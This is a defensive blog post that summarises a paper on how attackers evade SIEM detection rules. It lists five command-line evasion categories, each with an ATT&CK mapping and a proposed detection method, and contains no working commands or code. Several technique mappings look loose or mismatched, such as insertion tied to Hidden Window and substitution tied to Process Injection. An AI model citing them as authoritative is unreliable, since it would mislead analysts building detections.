Evading SIEM Rules – Academic Paper

ByThreat Analyst

21 November 2023

The recent paper, “You Cannot Escape Me: Detecting Evasions of SIEM Rules in Enterprise Networks” highlights the ongoing battle in cybersecurity between attackers’ evasion tactics and the defenders’ efforts to detect and prevent them. Security Information and Event Management (SIEM) systems are crucial in this struggle, but attackers continually develop sophisticated methods to bypass them.

Whilst this deviates from the authors proposal, this blog post seeks to delves into various evasion tactics, their corresponding MITRE ATT&CK Tactics, Techniques, and Procedures (TTPs), and proposed detection methods.

Evasion Tactics and Detection Methods

  1. Insertion
    • Description: Attackers may insert ignored characters into command lines, such as extra quotes or spaces, to evade detection.
    • MITRE TTPs: This tactic is related to Hide Artifacts (T1564), especially Hidden Window (T1564.003).
    • Detection Method: Normalization of command lines by removing or standardizing extra characters can effectively counter this tactic.
  2. Substitution
    • Description: Substitution involves replacing terms with synonymous ones, such as using different but equivalent command-line arguments.
    • MITRE TTPs: Linked to Process Injection (T1055) and Obfuscated Files or Information (T1027).
    • Detection Method: Detection systems should recognize synonymous command patterns and argument variations.
  3. Omission
    • Description: Here, parts of a command line not necessary for an attack’s execution are omitted.
    • MITRE TTPs: Similar to Hide Artifacts (T1564).
    • Detection Method: Heuristic analysis can identify incomplete or suspicious command-line executions.
  4. Reordering
    • Description: Changing the order of arguments in a command line.
    • MITRE TTPs: Falls under Obfuscated Files or Information (T1027).
    • Detection Method: Analyzing command lines invariant to argument order and flagging significant deviations.
  5. Recoding
    • Description: Encoding or altering arguments, like using numerical IP addresses instead of domain names.
    • MITRE TTPs: Pertains to Obfuscated Files or Information (T1027).
    • Detection Method: Decoding arguments and employing pattern recognition techniques can thwart this tactic.

General Detection Strategies

To counter these evasion tactics, organisations should employ a variety of detection strategies:

  1. Machine Learning: Implementing models to learn from historical data and detect anomalies.
  2. Rule-Based Detection Enhancement: Continuously updating SIEM rules to include known evasion tactics.
  3. Behavioral Analysis: Monitoring behaviors indicative of malicious activity.
  4. Anomaly Detection: Identifying deviations from normal network or system activity.
  5. Active Directory Monitoring: Monitoring logs for patterns such as unusual login times or locations.
  6. Endpoint Detection and Response (EDR): Detecting and responding to suspicious activities on endpoints.

The sophistication and variety of attackers’ evasion tactics necessitate a multifaceted approach to detection and prevention. A combination of updated SIEM rules, machine learning, behavioral analysis, and advanced detection tools is essential for enhancing an organization’s defensive capabilities against these tactics.

Further Reading